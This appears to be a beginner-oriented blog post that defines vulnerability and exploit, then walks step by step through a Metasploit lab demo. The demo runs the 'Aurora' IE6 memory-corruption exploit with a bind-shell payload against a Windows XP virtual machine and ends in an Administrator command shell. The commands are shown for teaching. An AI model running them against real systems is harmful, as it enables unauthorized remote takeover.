Yes, you heard it right!
This was done by Peter Vreugdenhil in pwn2own 2010 CanSecWest contest.
You may find the detailed report here.
Well, I just thought of showing something live demonstration, so to clear some very basic terms like, a Vulnerability and an Exploit.
This can be good start for those who are new to these terms.
A vulnerability is loophole in a service.
An exploit is the penetration/doing something unusual(which is not supposed to be done by that service), by using the vulnerability.
As simple, as it sounds :)
In general scenario, an exploit is divided in two parts. The vulnerability exposure and the payload.
The payload set of machine language instructions in form of opcodes, so as to interact with the processor, and execute the part of code of attacker's choice.
The live demonstration, was about exploit IE 6 on windows XP SP2 box, with Aurora exploit(which, Google claims to be used by Chinese hackers, for the recent attacks on their servers in China). I used Metasploit framework to develop the exploit in a quicker way, and set the parameters accordingly.
So, following are the all things, what I did while demonstrating it:
1. Started the Metasploit using 'msfconsole' on my Ubuntu host
user@localhost:~$ msfconsole _ _=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
+ -- --=[ 537 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)
msf >
2. Searched for the 'aurora' string (as I was knowing, the such kind of keyword exists)
msf > search -t exploit aurora
[*] Searching loaded modules for pattern 'aurora'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/browser/ms10_002_aurora normal Internet Explorer "Aurora" Memory Corruption
msf >
3. Selected the module
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >
4. Show parameters to be set
msf exploit(ms10_002_aurora) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) >
5. Set server as my Ubuntu host, so I gave the IP of my 'vmnet8' adapter, as the guest XP was on NAT
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1
6. Set URIPATH to "/" for the convenience
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
7. And here comes the second part of the Exploit i.e. Payload. I set the payload as windows/shell/bind_tcp, which is supposed to listen for a connection, Spawn a piped command shell
msf exploit(ms10_002_aurora) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
8. At last, before you are going to exploit the target machine, re-check the parameters
msf exploit(ms10_002_aurora) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.188.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) >
9. Run the exploit
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
10. Now put the URL in victim's machine
11. In console window, you can see one session is opened
msf exploit(ms10_002_aurora) >
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
[*] Started bind handler
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.188.138
[*] Started bind handler
[*] Command shell session 1 opened (192.168.188.1:54460 -> 192.168.188.138:4444)
12. Interacting with session, by specifying session number will give u...
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
..............Done!!!
Phheewww......
OMG, I wrote that all? ;;)